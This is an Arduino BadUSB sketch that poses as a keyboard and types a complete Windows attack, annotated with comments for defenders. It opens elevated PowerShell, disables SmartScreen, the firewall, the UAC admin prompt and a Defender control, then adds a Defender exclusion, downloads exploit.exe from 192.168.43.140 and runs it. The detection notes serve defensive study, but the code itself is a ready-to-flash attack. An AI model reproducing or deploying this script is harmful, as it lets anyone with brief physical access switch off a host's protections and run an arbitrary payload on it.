badusb

#include <Keyboard.h>

// Runs once after the board enumerates as a USB HID keyboard and types a fixed
// keystroke sequence into whatever has focus on the host. In order, it:
//   1. opens an elevated PowerShell from the Run dialog,
//   2. turns off SmartScreen, the Windows Firewall and the UAC admin prompt,
//   3. walks the Windows Security UI by arrow keys,
//   4. adds a Defender path exclusion, downloads an executable over plain HTTP
//      into that path and starts it,
//   5. writes fixed "on" values back to the SmartScreen/Firewall/UAC settings.
//
// Reading notes for defenders:
//   - Nothing is read back from the host; every step is blind typing separated
//     by fixed delay() calls.
//   - Every command is typed into an interactive PowerShell, so PowerShell
//     script-block logging (event 4104) and process-creation auditing record
//     the same strings that appear as literals below.
//   - The registry values, the firewall profile state and the Defender
//     exclusion list touched here are the configuration points to baseline and
//     alert on.
void setup() {

  Keyboard.begin();
  delay(1000);

  // Hold Left-GUI and 'r' (the Win+R chord that opens the Run dialog).
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');

  // Ask for an elevated PowerShell window (Start-Process -Verb RunAs).
  // Detection point: powershell.exe launching a second, elevated powershell.exe
  // from the Run dialog shortly after a new keyboard device is attached.
  Keyboard.println("powershell.exe -command start-process powershell -verb runAs");  // println also sends the line ending that submits the text
  delay(1000);
  // Left arrow, then Enter. NOTE(review): presumably moves focus to the accept
  // button of the elevation prompt and confirms it; not verifiable from this file.
  Keyboard.press(KEY_LEFT_ARROW);
  Keyboard.release(KEY_LEFT_ARROW);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);

  delay(1000);

  // Alt+o, then release every key still held. NOTE(review): looks like an
  // accelerator key for a localized prompt button; confirm against the target UI.
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press('o');
  Keyboard.releaseAll();
  delay(1000);

  // Disable the SmartScreen filter: sets SmartScreenEnabled to "Off" under
  // HKLM ...\CurrentVersion\Explorer and EnableWebContentEvaluation to 0 under
  // HKCU ...\CurrentVersion\AppHost. Both are plain registry writes, so registry
  // auditing on these two values is the detection point.
  Keyboard.print("Set-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\" -Name \"SmartScreenEnabled\" -Type String -Value \"Off\"");
  typeKey(KEY_RETURN);
  delay(1000);
  Keyboard.print("Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost\" -Name \"EnableWebContentEvaluation\" -Type DWord -Value 0");
  typeKey(KEY_RETURN);
  delay(1000);

  // Disable the firewall on the Domain, Public and Private profiles at once.
  delay(1000);
  Keyboard.print("Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False");
  typeKey(KEY_RETURN);


  // Disable the UAC prompt for administrators: ConsentPromptBehaviorAdmin = 0
  // under HKLM ...\Policies\System. From here on, elevation requests by an
  // administrator are no longer expected to show a consent dialog.
  delay(1500);
  Keyboard.print("Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name ConsentPromptBehaviorAdmin -Value 0");
  typeKey(KEY_RETURN);

  // Close the first elevated shell.
  delay(1000);
  Keyboard.print("exit");
  typeKey(KEY_RETURN);
  Keyboard.releaseAll();

  // Disable Windows Defender through the Windows Security UI.
  // The steps are: Win+R, open the windowsdefender://threat/ URI, six Down
  // arrows, Enter, Space (key code 32), then Alt+F4 to close the window.
  // NOTE(review): which control the key count lands on depends on the layout of
  // the Windows Security page on the host; presumably a protection toggle.
  delay(1000);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();
  delay(1500);

  Keyboard.println("windowsdefender://threat/");  // Opens Windows Defender
  delay(1500);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1000);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1000);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1000);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1000);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1000);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);

  delay(1000);
  Keyboard.press(32);
  Keyboard.release(32);

  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
  Keyboard.releaseAll();


  // Open an elevated PowerShell again. No prompt-confirming keys are sent this
  // time, presumably because ConsentPromptBehaviorAdmin was set to 0 above.

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.println("powershell.exe -command start-process powershell -verb runAs");  // same launch command as the first shell

  // Stage and run the payload:
  //   - create C:\Program Files\Dossier_test,
  //   - add that directory to the Defender exclusion list (Add-MpPreference),
  //   - download exploit.exe into it from http://192.168.43.140/,
  //   - change into the directory and execute the file.
  // 192.168.43.140 is a private (RFC 1918) address and the transfer is
  // unencrypted HTTP, so the request and the binary are visible to monitoring on
  // the local network. The exclusion change is a Defender configuration change
  // (logged as event 5007); an exclusion followed by a file write and a process
  // start from the excluded path is the correlation worth alerting on.
  delay(1000);
  Keyboard.print("New-Item 'C:\\Program Files\\Dossier_test' -itemType Directory");
  typeKey(KEY_RETURN);
  delay(1000);
  Keyboard.print("Add-MpPreference -ExclusionPath 'C:\\Program Files\\Dossier_test'");
  typeKey(KEY_RETURN);
  delay(1000);
  Keyboard.print("Invoke-WebRequest -Uri 'http://192.168.43.140/exploit.exe' -OutFile 'C:\\Program Files\\Dossier_test\\exploit.exe'");
  typeKey(KEY_RETURN);

  delay(500);
  Keyboard.print("cd 'C:\\Program Files\\Dossier_test\\';.\\exploit.exe");
  typeKey(KEY_RETURN);

  // Re-enable the SmartScreen filter from a third elevated PowerShell.
  // The values written in this section are constants, not the values that were
  // present before the sequence ran, so the host can end up configured
  // differently from its baseline.
  // Not reverted anywhere in this file: the Defender exclusion, the
  // Dossier_test directory and its contents, and whatever the Windows Security
  // key sequence changed (the code that would revisit it is commented out
  // below). These remain as artifacts for incident response.

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.println("powershell.exe -command start-process powershell -verb runAs");
  delay(10000);  // ten-second pause before typing into the new shell

  Keyboard.print("Set-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\" -Name \"SmartScreenEnabled\" -Type String -Value \"On\"");
  typeKey(KEY_RETURN);
  delay(1000);
  Keyboard.print("Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost\" -Name \"EnableWebContentEvaluation\" -Type DWord -Value 1");
  typeKey(KEY_RETURN);
  delay(1000);

  // Re-enable the firewall on all three profiles.
  delay(1000);
  Keyboard.print("Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True");
  typeKey(KEY_RETURN);


  // Re-enable the UAC prompt: ConsentPromptBehaviorAdmin is written as 2,
  // whatever it was before the sequence set it to 0.
  delay(1500);
  Keyboard.print("Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name ConsentPromptBehaviorAdmin -Value 2");
  typeKey(KEY_RETURN);

  // Close the last elevated shell.
  delay(1000);
  Keyboard.print("exit");
  typeKey(KEY_RETURN);
  Keyboard.releaseAll();

  /* Disabled code (never executed): re-enable Windows Defender through the UI.
    delay(1000);
    Keyboard.press(KEY_LEFT_GUI);
    Keyboard.press('r');
    Keyboard.releaseAll();
    delay(1500);

    Keyboard.println("windowsdefender://threat/");  // Opens Windows Defender
    delay(1500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW
    );
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);

    delay(1500);
    Keyboard.press(KEY_RETURN);
    Keyboard.release(KEY_RETURN);

    delay(500);
    Keyboard.press(KEY_LEFT_ARROW);
    Keyboard.release(KEY_LEFT_ARROW);

    delay(1500);
    Keyboard.press(KEY_RETURN);
    Keyboard.release(KEY_RETURN);


    delay(1000);
    Keyboard.press(KEY_LEFT_ALT);
    Keyboard.press(KEY_F4);*/
  Keyboard.releaseAll();

  // Stop emulating a keyboard; nothing further is sent after this point.
  Keyboard.end();
}

// Tap a single key: press it, wait 50 ms, release it.
// key: key code or character, passed unchanged to Keyboard.press()/release().
void typeKey(int key) {
  const unsigned long holdMs = 50;  // gap between the press and release reports

  Keyboard.press(key);
  delay(holdMs);
  Keyboard.release(key);
}

// Intentionally empty: the whole keystroke sequence is sent once from setup(),
// so nothing is typed again while the board stays plugged in.
void loop() {
}